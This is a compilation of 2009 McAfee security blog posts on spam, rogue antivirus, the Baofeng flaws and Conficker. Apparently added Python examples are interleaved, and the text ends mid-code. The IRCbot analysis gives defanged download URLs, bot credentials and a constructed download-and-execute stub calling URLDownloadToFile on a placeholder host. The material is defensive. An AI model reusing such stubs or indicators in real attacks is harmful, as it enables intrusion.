    New McAfee Whitepaper on Browser Attacks

    Today we at McAfee Avert Labs released an excellent paper on browser attacks. Written by Christoph Alme, this paper deals with the many complexities of browser security and attacks. From the paper:

    Web Browsers: An Emerging Platform Under Attack
    “The widespread use of highly interactive “rich client” web applications for e-commerce, business networking, and online collaboration has finally catapulted web browsers from straightforward HTML viewers to a full-blown software platform. And as corporate users are performing a significant portion of their work on the web, whether it’s researching or collaborating, the safety of the underlying platform is critical to the company’s success. ”

    Other areas the paper covers include:

    • The shift in spam to mainly malicious web link usage

    • “Web 2.0” sites—whether weblogs, social networking or portal sites—are increasingly spammed with links to malicious sites

    • Legitimate sites are compromised and misused to either host malicious code or link to a malicious website

    • Use of malicious video banners placed in advertisement networks

    • Use of popular search terms to advertise and drive (search query) traffic to a malicious website. In a recent case in Germany, attackers used Google AdWords to attract users who searched for “flash player” to the attacker’s fake Adobe-look-alike site

    Download the paper in its entirety here.

    McAfee Releases June Spam Report

    Today we released our Spam Report for the month of June. In it we discuss two key findings:

    President Obama’s First 100 Days of Spam
    Although you might imagine the change of administration in the United States would have a major impact on the Internet, the first 100 days of Obama’s presidency were mostly business as usual in the spam world.

    Identifying Spam Trends of the Future
    Even though we’ve been told to avoid clicking such links to prevent spammers from learning who we are, many of us forget to be vigilant because the overall detection accuracy of anti-spam products has improved. Recipients may instantly distrust an executable attached to an email, but they often feel unthreatened by a short blurb and a URL.

    What does the future of spam hold for us? Spam is all about making money and, as with most businesses, spammer CEOs need to worry about costs and their bottom lines. As long as we continue to behave as suckers, spammers will use sophisticated tactics to separate us from our money. Download the full report here.

    Who Digs the Elephant Trap?

    It is ironic, but the rapid growth rate of malware attacks is partly due to how successful AV technology has become. If AV scanners were not so successful in blocking Trojans and viruses, there would be little need for the bad guys to write new ones. One can even say that malware writers are digging an elephant trap for all computer users because lots of new malware demands a response from AV, which can contribute to the slower operation of computers for all of us.

    Figuratively speaking, the primary tools that the bad guys are using to dig their side of the trap and evade detection are packers (like UPX and Petite) and protectors (like Armadillo and Themida). Packers are legitimately used to reduce the size of programs (saving disk space), while protectors are legitimately used to prevent patching, hacking or reverse engineering. For malware production, however, packers and protectors are useful as they can often obfuscate original malware beyond recognition by AV.

    Commercial protectors are especially loved by malware writers because they can put a protective envelope on top of, say, their spam-bot and it will be well hidden inside. Additionally, it will now really look more like a legitimate file obfuscated with the same protector. Malware writers use this trick more and more frequently.

    As a result, on any average computer, AV can frequently encounter, say, a Themida-packed computer game and a Themida-packed spam-bot. To determine what is what, an AV product has to know what is “under” the protecting envelope. Unfortunately, this simply cannot be done very quickly. It takes computing cycles.
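    One cheap signal that a file is wearing such an envelope is byte entropy: compressed or encrypted code looks nearly random, while plain code and data do not. The following added example shows that heuristic, including the sliding-window variant needed to catch a packed region hidden inside a mostly plain file. It is not McAfee code. The samples are constructed (text-like bytes, the same bytes zlib-compressed as a stand-in for a packed image, and a mix of the two), and the threshold and window size are assumptions.

```python
"""Entropy heuristic for spotting packed or protected executables.

Added example, not McAfee code.  Samples are constructed: a text-like body,
that body compressed with zlib to stand in for a packed image, and a mostly
plain file with a compressed tail.  Threshold and window size are assumptions.
"""
import math
import random
import zlib
from collections import Counter

_rng = random.Random(2009)
_WORDS = ["packer", "protector", "legitimate", "program", "saves", "disk",
          "space", "signed", "file", "analysis", "takes", "cycles", "the", "and"]

PLAIN_SAMPLE = " ".join(_rng.choice(_WORDS) for _ in range(20000)).encode("ascii")
PACKED_SAMPLE = b"MZ" + b"\x00" * 62 + zlib.compress(PLAIN_SAMPLE, 9)
MIXED_SAMPLE = PLAIN_SAMPLE[:60000] + zlib.compress(PLAIN_SAMPLE, 9)


def shannon_entropy(data):
    """Bits per byte: 0.0 for empty input, 8.0 for a uniform distribution."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def max_window_entropy(data, window):
    """Highest entropy over fixed-size windows; the final window is aligned to
    the end of the data so a short tail fragment is never measured alone."""
    if len(data) <= window:
        return shannon_entropy(data)
    starts = list(range(0, len(data) - window, window)) + [len(data) - window]
    return max(shannon_entropy(data[s:s + window]) for s in starts)


def assess(data, threshold=7.0, window=4096):
    """Whole-file and best-window entropy plus a verdict.  The whole-file
    figure alone misses a packed region inside a mostly plain file."""
    whole = shannon_entropy(data)
    peak = max_window_entropy(data, window)
    return {"whole": round(whole, 3), "max_window": round(peak, 3),
            "packed": peak >= threshold}


if __name__ == "__main__":
    for name, sample in (("plain", PLAIN_SAMPLE), ("packed", PACKED_SAMPLE),
                         ("mixed", MIXED_SAMPLE)):
        print(name, assess(sample))
```

    The plain sample stays well under the threshold, the compressed one sits near 8 bits per byte, and the mixed file is the instructive case: its whole-file entropy is pulled down by the plain bulk, yet one window over the tail crosses the threshold. This is a triage hint, not a verdict: legitimate installers and games ship compressed resources too, which is exactly the post's point that the scanner still has to look under the envelope, and why a signature from the publisher helps tip the balance.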

    We would urge all developers who use software protection to think twice before doing so. There is an increasing risk that your legitimate files will be blocked by AV software by mistake or that there will be an unpleasant slowdown due to long analysis. Either can cause troubles for users. If you feel that you really must use an obfuscating protector at least digitally sign your files. That would reduce the level of suspicion by introducing traceability to the source.

    The point is that software protectors are just not a secure software technology any longer because they have been misused so much. Do not use them if you can avoid it.

    Bad Program Logic Amplifies Baofeng Attack

    A distributed denial-of-service (DDOS) attack on DNS servers of a domain registrar coupled with bad program logic in a popular media application caused network outages in parts of China last week.

    Baofeng is a widely popular media player in China, with a total of 200 million users and several million users online simultaneously. The player starts when Windows boots and connects to Baofeng’s online server; then it’s designed to send DNS queries to DNS servers to get the IP addresses of different online servers until it gets an answer. Because of its massive number of online users, it would be a powerful DDOS attack tool if all online Baofeng programs were to send continuous DNS queries at the same time, especially if the authoritative DNS server could not answer the queries.

    Several DNS servers of DNSPod (a Chinese domain service provider and registrar) were hit by a DDOS attack on the night of May 18. These DNS servers became inaccessible. The assault was meant to be a targeted attack against one company, but one of the customers of DNSPod is Baofeng.com, whose authoritative DNS server was the server under attack. Because of a design flaw in Baofeng’s media player, all online Baofeng programs started continuously sending DNS queries after the DNS responses previously cached by other servers timed out on May 19. The massive number of DNS queries flooded the network of China Telecom (one of the biggest ISPs in China). As a result, users in parts of China were unable to access websites.

    The initial DDOS attack that targeted a specific domain registrar was thus transformed into a DDOS attack on almost all DNS servers in China, so we can see how a bad design in a program “helped” the attacker(s) amplify the attack.
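    The design flaw the post describes is a retry loop that never backs off. The following added example models that behaviour for a population of clients whose authoritative server is unreachable and contrasts it with capped exponential backoff, the usual fix. It is not Baofeng's or McAfee's code; the client count, outage length and timer values are assumptions chosen for illustration, and every client is modelled as starting its queries at the same moment.

```python
"""Model of retry amplification against an unreachable DNS server.

Added example, not Baofeng's or McAfee's code.  It counts the queries a
population of clients sends during an outage under two retry policies;
client count, outage length and timer values are assumptions.
"""


def fixed_interval(attempt, interval=1.0):
    """Retry policy that never backs off: the flaw the post describes."""
    return interval


def exponential_backoff(attempt, base=1.0, cap=300.0):
    """Retry policy that doubles the wait after each failure, up to a cap."""
    return min(base * (2 ** attempt), cap)


def simulate(clients, outage_seconds, delay_fn):
    """Return (total_queries, peak_queries_per_second) for `clients` programs
    that all start at t=0 while the server stays down for `outage_seconds`;
    every query fails, so each one schedules the next retry."""
    per_second = {}
    total = 0
    for _ in range(clients):
        t, attempt = 0.0, 0
        while t < outage_seconds:
            total += 1
            bucket = int(t)
            per_second[bucket] = per_second.get(bucket, 0) + 1
            t += delay_fn(attempt)
            attempt += 1
    return total, max(per_second.values())


if __name__ == "__main__":
    for name, policy in (("fixed 1 s", fixed_interval),
                         ("exp backoff", exponential_backoff)):
        total, peak = simulate(100, 600, policy)
        print(f"{name:12s} total={total:6d} peak={peak:4d}/s")
```

    With 100 clients and a 10-minute outage, the fixed one-second retry sends 60,000 queries and holds the network at 100 queries per second for the whole outage, while capped exponential backoff sends 1,000 and is down to one burst every five minutes by the end. Adding random jitter to the backoff, which this model omits, would also spread the synchronized bursts that the simultaneous start produces.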

    Urban ‘Attack’ on Infrastructure

    Supervisory Control and Data Acquisition, or SCADA, stands for large-scale distributed remote processing systems that gather data in real time to control critical industrial, infrastructure, or facility processes and equipment. SCADA is used in power plants as well as in oil and gas refining, telecommunications, transportation, and water and waste control.

    Stories about intruders who damage the power grid or any other key SCADA infrastructure frequently make the headlines. In the past, as in Mexico in 2007, extraterrestrial creatures and flying saucers were occasionally blamed.

    Since then, our enemies have changed. The Wall Street Journal reported in April that a federal audit had found critical infrastructure facilities in the U.S. power industry compromised with software that would allow the attackers to disable key elements of the national power grid. “The Chinese have attempted to map our infrastructure, such as the electrical grid,” a U.S. senior intelligence official said on the occasion. One year ago, the CIA claimed that a cyberattack had caused a multicity power outage at an unspecified location outside the United States. The CIA story broke on May 14. It’s rumored that Hydro-Quebec was also a target of cyberspies.

    Last week, I discovered a video posted on YouTube in November 2008. We can see two guys hacking a central light system and then playing Space Invaders on it!

    I have some doubts about the technical aspects of these light-show “attacks” on unprepared buildings. But fake or not, the video confirms that hackers and cybercriminals have got their eyes on SCADA networks. Perhaps the first demo was just for fun, but the others will have less juvenile goals. An attack can involve nationwide damage, a terrible effect on the public’s morale, and huge financial losses. Modern SCADA networks are more vulnerable than ever because they use open networking standards (such as TCP/IP), are now deployed under less secure operating systems (Windows), are connected to other networks (including Internet), and cannot be easily updated and rebooted.

    For SCADA, which typically allows only a closely defined list of applications to run, a security approach that includes whitelisting can be a good solution. McAfee’s recent acquisition of Solidcore will help our customers in this area.

    McAfee Unveils H*Commerce Web Film Series on Cybercrime

    Today we launched a new web film series, entitled “H*Commerce: The Business of Hacking You.” The film series was created to expose cybercrime as a serious and universal threat that can no longer be ignored. Several of our own Avert Labs researchers lent a hand and their big ol’ brains to the project!

    The term H*Commerce (or Hacker Commerce) is defined as the business of making money through the illegal use of technology to compromise personal and business data. Starting today, a new episode will be posted every two weeks here until all six episodes have aired.

    The project was originally conceived as a series of standalone episodes, each focusing on different aspects of cybercrime: such as phishing, denial-of-service attacks, online scams, bank scraping, and fraudulent emails. As the filmmakers dug deep into the experience of H*Commerce victims, they realized the film’s focus had to be on the complex stories of real people doing normal online things, only to be horribly violated by ruthless cybercriminals.

    Seth Gordon, director of films such as the 2008 theatrical release of “Four Christmases,” and the documentary “The King of Kong–A Fistful of Quarters,” was hired to direct “H*Commerce: The Business of Hacking You.” As Gordon began the research phase of the film, he identified an Oregon woman named Janella Spears, who was a victim of one of the largest and most elaborate email scams on record.

    Spears’ story of losing more than $440,000, and the dire effects it had on her family and marriage, became the central theme of the film series. Over the course of the filming, Chris Roberts, a third-party cyberforensic expert, was introduced to Ms. Spears to provide advice on how to clean her system, handle the hackers, and help put an end to the cybercrime scams.

    Watch, learn, and arm yourself with knowledge. Check it out at Stop H*Commerce.

    FakeAlert Trojan Holds Systems For Ransom

    In March 2009, we notified our customers of a new variant of the infamous Vundo Trojan family, which we detected as Ransom-F, and raised its risk assessment to a Low-Profiled threat. It was possibly the first indicator of a shift in the FakeAlert criminal model from instilling fear to holding information technology resources for ransom, but certainly not the last.

    Last week, we came across a new variant of a rogue security program branded by its creators as “System Security 2009” and detected it as FakeAlert-CO; some of its past, similarly branded cousins are detected as FakeAlert-SystemSecurity.

    The updated variants were discovered on a web page hosted on trustedw{blocked}security.com. Like most other rogue security programs to date, FakeAlert-CO displays spurious alerts and makes fraudulent claims of infections that require the user to pay a fee to “repair.” Following the trend of Ransom-F, we noticed “new features” in FakeAlert-CO that resemble some common characteristics of ransomware Trojans.

    Once installed, FakeAlert-CO either terminates all running user processes or prompts the user to reboot.

    In either case, it then pretends to perform a system scan and reports detections of false and exaggerated threats.

    What distinguishes it from older variants is that the user will no longer be allowed to open or execute any applications, including Task Manager, Command Prompt, or other system and office applications, which are terminated by FakeAlert-CO. A message is displayed to the user indicating that the files are infected and that, to resolve the issue, the user must activate FakeAlert-CO at a cost.

     

     

    The “product” website is made to look fairly professional, offering the option to purchase a two-year license or a lifetime support license at a “discount”, and even comes with a 30-day money-back guarantee!

    You may be paying for the “best” possible support option, but you can’t trust a “product” that holds your system for ransom.

    Uninstalling the System Security “product” is not an option for the typical user: there is no uninstaller, and “Add or Remove Programs” in the Control Panel cannot be opened by the usual means either.

    However, the files reported as infected are intact and have not been modified in any way. If the user boots into Safe Mode, FakeAlert-CO is not started automatically, and system tools and applications can be run and accessed normally.

    Affected VirusScan users may remove this threat using the latest DATs and engine.

    McAfee Releases First-Quarter Threats Report

    Today McAfee Avert Labs released its Threats Report for the first quarter of 2009. In it we reveal that cybercriminals have taken control of almost 12 million new IP addresses since January, a 50 percent increase since 2008. The United States is now home to the largest percentage of botnet-infected computers, currently hosting 18 percent of all zombie machines. Seems the bad guys are attempting to recover from last November’s takedown of a central spam-hosting ISP by rebuilding their army.

    Other Key Findings

    The Koobface virus has made a resurgence, and more than 800 new variants of the virus were discovered in March alone.

    Servers hosting legitimate content have increased in popularity with malware writers as a means for distributing malicious and illegal content.

    Cybercriminals are increasing their use of URL redirects and Web 2.0 sites to disguise their locations.

    Compared with the overall landscape, the Conficker worm represents a small subset of all threat reports. AutoRun malware, on the other hand, represented 10 percent of reported detections during the first quarter–quite a bit more than Conficker itself.

    You can find the full text of the “McAfee Threats Report: First Quarter 2009″ here.

    Baofeng Media Player: May Day Zero-Day Exploit Fixed

    On April 30, an exploit targeting a zero-day vulnerability in the Baofeng media player was published on the Internet. The proof-of-concept exploit had more than enough details for others with malicious intent to create more malicious variants.

    Baofeng is a widely popular media player in China that plays many common media file formats. May 1 to 3 was the May Day weekend in China, and one can imagine many Chinese users surfing the net or searching for their favorite video clips being hit by this vulnerability during the holidays.

    Because the vulnerability lies in an ActiveX component, attackers can deliver the exploit through common means such as SQL injection into legitimate sites, or simply by uploading malicious web content to sites they control. Once a user browses such a page, the flawed ActiveX component lets the attacker execute arbitrary code on the user’s computer.

    The vendor has confirmed this flaw, and the following versions are reportedly affected:

    •  Build versions 3.09.03.30, 3.09.03.25, 3.09.04.17, and 3.09.04.27.

    A patch has been released for this vulnerability. Affected users should immediately contact the vendor for the security update.

    McAfee VirusScan has proactively detected this exploit as the JS/Exploit-BO.gen Trojan since as early as the 4679 DATs (January 20, 2006).

    Beware of Shady Installers

    Today I came across a program that claims to be an installer for the VLC media player. Innocent, right? Guess again. For starters, the installation file was different from that supplied by the legitimate VLC media player site.

    At Step 3 of the installation I saw this dialog box:
    Step 3 of Ransom-E installation

    The translation of the message from French is, “HELP US IMPROVE OUR SERVICE. To obtain your activation code call [number removed]. To receive your code in SMS send the keyword CODE to [number removed].” This is a case of SMS fraud!

    As usual, we shouldn’t install programs from sources we don’t trust. In our case, we know from Step 3 of the installation that we’re dealing with fraudsters. So why continue with the installation? :-)

    We detect this Trojan as Ransom-E, updated in the 5597 DATs.

    Drive-by-Download Du Jour

    LuckySploit is an exploit framework that’s been in the news recently. As drive-by-downloads go, it lurks behind iframes and foists malware upon unsuspecting users.

    One LuckySploit attack we analyzed downloaded the FakeAlert-BY Trojan. So if you visited a web site today and then saw this…

    FakeAlert-BY

    … then you are, unfortunately, infected with FakeAlert-BY, and possibly thanks to LuckySploit.

    We detect the LuckySploit downloader as JS/Downloader-BNL in the 5580 DATs, to be released on April 10. We’ve had detection for FakeAlert-BY since the 5545 DATs, released on March 6.

    Please update your AV signatures and stay secure!

    Donbot – Joining The Club of Million Dollar Botnets

    Microsoft recently reported a new worm found to be exploiting the MS08-067 software flaw in the wild.  Even though our products already detected it generically as W32/IRCbot.gen.a, we decided to take a closer look and make sure we proactively detect all components that the worm might be dropping or downloading.

    When run, W32/IRCbot.gen.a copies itself to <system folder>\netmon.exe. It then drops a rootkit as <system folder>\drivers\sysdrv32.sys (MD5: 0e219b74e2c68a34ca09d8fe114f6d11) and hooks the Windows tcpip.sys driver to remove the outbound connection limits of Windows XP Service Pack 2 and newer. We detect this rootkit as the Generic Rootkit.g trojan. The worm then establishes an outbound connection to a remote IRC server using the following credentials:

    • PASS h4xg4ng
    • NICK [00-USA-XP-9215671]
    • USER SP2-ojd, followed by the name of the infected computer.

    The worm does indeed exploit the MS08-067 vulnerability, using a download-and-execute shellcode that behaves identically to Conficker’s, with only minor differences in implementation. The shellcode is encoded with a simple one-byte XOR key and, once decoded, looks like any other standard PEB-walking shellcode: it resolves its APIs by walking the Process Environment Block, loads the libraries it needs (e.g., urlmon.dll), and calls URLDownloadToFile() to fetch the malware from an already infected system onto the new target. Unlike Conficker, which injects a downloaded DLL into running Windows processes, this worm downloads and runs an executable named 66.scr.

    ShellCode
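    A one-byte XOR layer is trivial to strip once you know what the decoded stub must contain. The following is an added example, not McAfee’s tooling and not the worm’s own bytes: it brute-forces all 256 keys over a shellcode blob, scores each candidate by the DLL name, API name and URL strings a download-and-execute stub carries in the clear, and pulls the download URL out of the winner. The encoded sample is constructed inside the block (a plausible plaintext XORed with the assumed key 0x5A), and its host is a TEST-NET address standing in for an already infected machine.

```python
"""Strip a one-byte XOR layer from a download-and-execute stub and recover
its URL.  Added example, not McAfee's tooling; the encoded sample below is
constructed here and is not taken from W32/IRCbot.gen.a."""
import re
from typing import List, Tuple

# A download-and-execute stub needs the DLL name for LoadLibrary and the URL
# for URLDownloadToFile in the clear once decoded (API names may instead be
# resolved by hash, so the DLL name and the URL are the dependable markers).
MARKERS = (b"urlmon", b"URLDownloadToFile", b"http://", b".exe", b".scr")
URL_RE = re.compile(rb"https?://[\x21-\x7e]+")


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte; encoding and decoding are the same op."""
    return bytes(b ^ key for b in data)


def score(candidate: bytes) -> int:
    """Heuristic: each marker hit is worth far more than printable-ASCII density."""
    total = sum(100 * candidate.count(m) for m in MARKERS)
    total += sum(1 for b in candidate if 0x20 <= b < 0x7F)
    return total


def crack_single_byte_xor(blob: bytes) -> Tuple[int, bytes]:
    """Try all 256 keys and return (key, plaintext) for the best-scoring one."""
    best = max(range(256), key=lambda k: score(xor_bytes(blob, k)))
    return best, xor_bytes(blob, best)


def extract_urls(plain: bytes) -> List[str]:
    """Pull every http(s) URL out of the decoded stub."""
    return [m.group(0).decode("ascii") for m in URL_RE.finditer(plain)]


# Constructed stand-in for the encoded payload: a few opcode-looking bytes
# followed by the strings such a stub embeds, XORed with an assumed key.
# The host is a TEST-NET address, standing in for an already infected system.
PLAIN_SAMPLE = (
    b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
    b"urlmon.dll\x00URLDownloadToFileA\x00"
    b"http://192.0.2.10:88/66.scr\x00"
    b"\xff\xd5\x31\xc9\xc3"
)
SAMPLE_KEY = 0x5A
ENCODED_SAMPLE = xor_bytes(PLAIN_SAMPLE, SAMPLE_KEY)


if __name__ == "__main__":
    key, plain = crack_single_byte_xor(ENCODED_SAMPLE)
    print(f"key=0x{key:02x} urls={extract_urls(plain)}")
```

    The marker weighting is what makes this robust: a wrong key can produce a high printable-byte count by chance, but it will not produce “urlmon” or “http://”, so the right key wins by hundreds of points. On a real capture, run the same function over the bytes that follow the MS08-067 overflow in the SMB request.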

    The Conficker worm uses an exploit derived from the “ms08_067_netapi” Metasploit module to spread itself. The Metasploit framework has become a popular platform for security tool development and automation, and as we can see, the latest version is used not only by whitehats for vulnerability assessments and penetration testing, but also for malware development. W32/IRCbot.gen.a is no exception: it carries remote language detection taken from Metasploit’s “smb_fingerprint()” routine in the “smb.rb” module, as well as the DCERPC service connection test code from the “client.rb” module. With these routines, the worm can conveniently determine which operating system and service pack it is targeting, improving its infection success rate. The order in which W32/IRCbot.gen.a sends its attack packets is identical to that of Metasploit’s MS08-067 module (ms08_067_netapi.rb):

    WireShark

    Both Conficker and W32/IRCbot.gen.a turn open-source tools to their advantage in the same way, making their work much easier.

    We went on to investigate the additional sites the worm connects to and the payload it tries to download. Packet sniffer logs show that it contacts at least two other remote servers:

    • hxxp://98.1[infected].42:443/n
    • hxxp://74.2[infected].90:88/jueo.exe

    While the first server showed no activity at the time of our research, the second was still active and hosted additional malware that is installed onto infected machines:

    VirusTotal

    Well, hello Donbot! The downloaded malware (MD5: 916DB2E2C2D1ED7AF89DD8EBB9C7D84C), detected generically as Generic.dx, turns out to be a component of an active botnet called Donbot (also known as Bachsoy). Donbot components typically set up a proxy on infected machines and may be used to relay spam and HTTP traffic. With a few exceptions, most AV vendors have detection for this malware.

    Until recently, Donbot has been a relatively minor player in the lucrative spam business, but it certainly looks as though the Donbot authors have decided to expand the potential of their botnet. While other botnets, namely Cutwail and Rustock, continue to dominate spam distribution, Donbot is making an eager attempt to win a bigger share of the spam revenue pie as one of the top five most active botnets worldwide. Clearly, worm authors are focused on growing their botnets, as they might not get another chance like the MS08-067 exploit for a long time.

    This also serves as yet another reminder that there may well be many computers on the Internet still missing the latest security updates, more than five months after the release of the MS08-067 patch.

    Google Searching for Madoff’s Yacht Leads to Fake Anti-Virus and Malware

    Have you ever read an article on the web where you just had to Google a certain term or phrase to learn more about it, or simply to satisfy your curiosity? The answer is probably yes, and it’s likely a frequent occurrence. Malware distributors have figured that out too. Here’s an example. A news article about disgraced financier Bernard Madoff mentioned his 55-foot yacht, a 1969 Rybovich. Wow, I bet that’s a spectacular yacht. If you wonder what one looks like, you might do a quick search for “1969 Rybovich.” One might think such a casual search would be harmless. Think again. It turns out malware distributors have homed in on the yacht phrase, and the top Google results are malicious URLs. We first noticed this on the evening of April 1, when we read the story and were curious, and our first take was “Wow, they are fast.” We watched the number of Google results that presented malware evolve over the course of April 2. The last time we checked, even one of the blogs on my.barackobama.com was using this yacht to lure users.

    Google Search Results

    The search results don’t look so threatening, but if you click on the first few URLs, you’ll find otherwise. Each of these URLs is a rogue anti-virus URL that will distribute malware. Here are a couple of examples…

    Quite a bad site indeed!

    Misleading Searches Lead to Porn and Malware!!!

    These two examples should arouse suspicion by now, especially if you’re looking for yachts, but anyone acting in haste, or succumbing to further curiosity will be taken to the malware delivery upon clicking where prompted, and frequently it’s already been delivered even if you don’t click.

    This example is quite typical of what you’ll see next when you click, a fake malware scan that delivers the malicious goods. It looks just like an MS scanner!!!

    Rogue AV Sure Does Look Real!!!

    So what about that 1969 Rybovich? What about further curiosity-driven Googling? Next time you find yourself conducting such a search, do so with caution. Consider whether the search result URLs all look similar. In this case, that is the first red flag. When you click through to a link, does the content look like what you expected, or is there some unexpected prompt to click? That is red flag number two. One shouldn’t even proceed to red flag number three, the fake malware scan. By then you are already on a dangerous path that is not going to show you anything about Madoff’s yacht.

    Next Up: Office Exploits Reloaded

    We’ve just seen the Microsoft Excel 0-day attacks in February. Today, Microsoft published a new Security Advisory reporting a new unpatched vulnerability in Microsoft Office PowerPoint.

    McAfee Avert Labs investigated and discovered multiple attacks in the field using the PowerPoint exploit. McAfee VirusScan products detect this threat as the Exploit-PPT.k trojan with the 5573 DATs, to be released the same day.

    As with most other document exploits, these PowerPoint files install malicious trojans in the background while displaying an innocent PowerPoint presentation to the victim as a decoy. The following list shows the variety of malware files installed in these attacks:

    • fssm32.exe: 428,032 bytes (Muster.c trojan)
    • IEUpd.exe: 45,056 bytes (Muster.c trojan)
    • setup.exe: 131,072 bytes (Muster.c trojan)
    • PeerCM.exe: 80,666 bytes (Generic BackDoor.u trojan)
    • ws2_42.dll: 106,740 bytes (Generic BackDoor.u trojan)

    Some of these specially crafted exploits arrived as PowerPoint Show files with the “.pps” extension. Such files typically open in full-screen mode, hiding the applications running on the desktop, including any system monitoring tools that could give the victim a clue about the dodgy installation of trojans.

    Please keep your DAT files up-to-date and refrain from opening any PowerPoint files from any untrusted sources until a patch is made available by the vendor. Where possible, verify with the sender to make sure what you get is what was intended.

    Conficker.C Over The Wire

    A lot has already been written about Conficker; there have been excellent analysis reports from SRI, The Honeynet Project and others. Vinay Mahadik and I would like to present some findings on the network aspects of Conficker.C’s behavior.

    We set up a small testbed with a machine infected with Conficker.C in a controlled environment and a Linux box customized for packet mangling. This let us intercept or mangle the packets exchanged between the infected machine and the outside world. We monitored the activity of the infected host over several days and classify the test into two phases: the pre-April 1 phase and the April 1 phase.

    During the Pre- April 1st phase we observed the following.

    Conficker.C gets the current time from some popular websites. This involves sending a DNS query to the name server to resolve the IP address of the website, followed by an HTTP GET request to that IP address. The figure below illustrates an attempt made to craigslist.org:

    Conficker.C also sends UDP and TCP probes to locate its peers. We observed fairly aggressive, simultaneous UDP and TCP scans. The volume of the UDP scans was particularly high, roughly 2-3 UDP queries per second, and seemed to taper off as we got closer to April 1. As most of the randomly generated IP addresses were not live or did not have the targeted ports open, a large number of ICMP messages came back: port unreachable, host unreachable, and time-to-live exceeded.
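    That scan pattern, a steady rate of UDP probes to many random addresses most of which come back as ICMP unreachable, is visible in flow or firewall logs without any knowledge of the peer-to-peer protocol itself. The following is an added detection sketch, not the Network Security Platform heuristic: it reads constructed flow-log lines in a simple space-separated format assumed for the example, computes per source the probe rate, the number of distinct peers and the ICMP-unreachable replies, and flags sources that exceed assumed thresholds. The addresses come from documentation ranges and the epoch is a time near April 1, 2009.

```python
"""Flag hosts that probe random peers over UDP the way the post describes:
many distinct destinations at a steady rate, mostly answered by ICMP
unreachable.  Added detection sketch, not the Network Security Platform
heuristic; the log format and thresholds are assumptions for the example."""
from collections import defaultdict
from typing import Dict, List, NamedTuple


class Flow(NamedTuple):
    ts: float
    src: str
    dst: str
    proto: str   # "udp" or "icmp"
    info: str    # udp: "dport=N"; icmp: "type=T code=C <text>"


def parse_flow_line(line: str) -> Flow:
    """Assumed line format: '<epoch> <src> <dst> <udp|icmp> <info...>'."""
    ts, src, dst, proto, info = line.split(maxsplit=4)
    return Flow(float(ts), src, dst, proto.lower(), info)


def scanning_hosts(lines: List[str], min_rate: float = 1.0, min_peers: int = 30,
                   min_unreach_ratio: float = 0.5) -> Dict[str, dict]:
    """Per source: UDP probe count, distinct peers, probes per second over the
    capture span and ICMP-unreachable replies; return the sources that pass
    all thresholds (the thresholds are assumptions, tune them per network)."""
    probes: Dict[str, List[Flow]] = defaultdict(list)
    unreachable: Dict[str, int] = defaultdict(int)
    for line in lines:
        if not line.strip():
            continue
        f = parse_flow_line(line)
        if f.proto == "udp":
            probes[f.src].append(f)
        elif f.proto == "icmp" and "unreachable" in f.info.lower():
            unreachable[f.dst] += 1   # the ICMP error is addressed to the prober
    flagged: Dict[str, dict] = {}
    for src, plist in probes.items():
        span = max(max(p.ts for p in plist) - min(p.ts for p in plist), 1.0)
        stats = {
            "probes": len(plist),
            "peers": len({p.dst for p in plist}),
            "rate": len(plist) / span,
            "unreachable": unreachable.get(src, 0),
        }
        ratio = stats["unreachable"] / stats["probes"]
        if (stats["rate"] >= min_rate and stats["peers"] >= min_peers
                and ratio >= min_unreach_ratio):
            flagged[src] = stats
    return flagged


# Constructed log: 10.0.0.5 probes 40 random peers in about 20 s and gets 30
# port-unreachable replies back; 10.0.0.7 only talks DNS to its resolver.
T0 = 1238544000.0   # 2009-04-01 00:00:00 UTC, chosen for the example
SAMPLE_LOG = (
    [f"{T0 + i * 0.5:.1f} 10.0.0.5 198.51.100.{i + 1} udp dport={40000 + i}"
     for i in range(40)]
    + [f"{T0 + i * 0.5 + 0.1:.1f} 198.51.100.{i + 1} 10.0.0.5 icmp type=3 code=3 port-unreachable"
       for i in range(30)]
    + [f"{T0 + i * 5:.1f} 10.0.0.7 10.0.0.1 udp dport=53" for i in range(4)]
)


if __name__ == "__main__":
    for host, stats in scanning_hosts(SAMPLE_LOG).items():
        print(host, stats)
```

    The three conditions are deliberately combined: rate alone matches busy DNS resolvers, distinct-peer count alone matches BitTorrent clients, and the unreachable ratio alone matches a host whose upstream is flapping. A host that trips all three is talking to addresses it made up, which is what a peer-discovery scan looks like from the outside.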

    “April Fooling Conficker.C”

    In the April 1 phase, we intercepted and manipulated the responses to the HTTP date-check queries so that, for every website Conficker.C queried, it received a response with a date stamp of April 1, 2009. The local system time was also set to April 1. By controlling the only two date sources, the HTTP responses and the local clock, we managed to fool the malware into thinking it was indeed April 1! Soon after, we observed numerous DNS queries for the generated domain names.
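    Reproducing the “April fooling” step only requires rewriting one header in the responses. The following is an added example, not the authors’ packet-mangling setup: it rewrites the Date header of a raw HTTP response to a chosen instant and can read the date back so a harness can check what the sample will see. It operates on the response bytes, so it fits a proxy or an NFQUEUE handler alike. The sample response is constructed; the date in it is a placeholder.

```python
"""Rewrite the Date header of a raw HTTP response so a sample that asks
popular websites for the time is told it is a chosen day.  Added example of
the packet-mangling step in the post, not the authors' setup; it works on the
response bytes so it fits a proxy or an NFQUEUE handler alike.  The sample
response below is constructed."""
import re
from datetime import datetime, timezone
from email.utils import format_datetime, parsedate_to_datetime
from typing import Optional

# Matches the Date header line anywhere in the header block, any case.
DATE_HDR = re.compile(rb"^(date:[ \t]*)([^\r\n]*)", re.IGNORECASE | re.MULTILINE)


def http_date(dt: datetime) -> str:
    """RFC 1123 form ('Wed, 01 Apr 2009 12:00:00 GMT'), always in GMT."""
    return format_datetime(dt.astimezone(timezone.utc), usegmt=True)


def extract_date(response: bytes) -> Optional[datetime]:
    """Read the Date header back as an aware datetime, or None if absent/invalid."""
    head = response.partition(b"\r\n\r\n")[0]
    m = DATE_HDR.search(head)
    if not m:
        return None
    try:
        return parsedate_to_datetime(m.group(2).decode("ascii", "replace"))
    except (TypeError, ValueError):
        return None


def rewrite_date(response: bytes, fake_now: datetime) -> bytes:
    """Return the response with its Date header set to fake_now; unchanged if
    there is no Date header (nothing to spoof) or no header/body boundary."""
    head, sep, body = response.partition(b"\r\n\r\n")
    if not sep:
        return response
    new_value = http_date(fake_now).encode("ascii")
    new_head, n = DATE_HDR.subn(lambda m: m.group(1) + new_value, head, count=1)
    return new_head + sep + body if n else response


# Constructed response, as a time-check site might return it.
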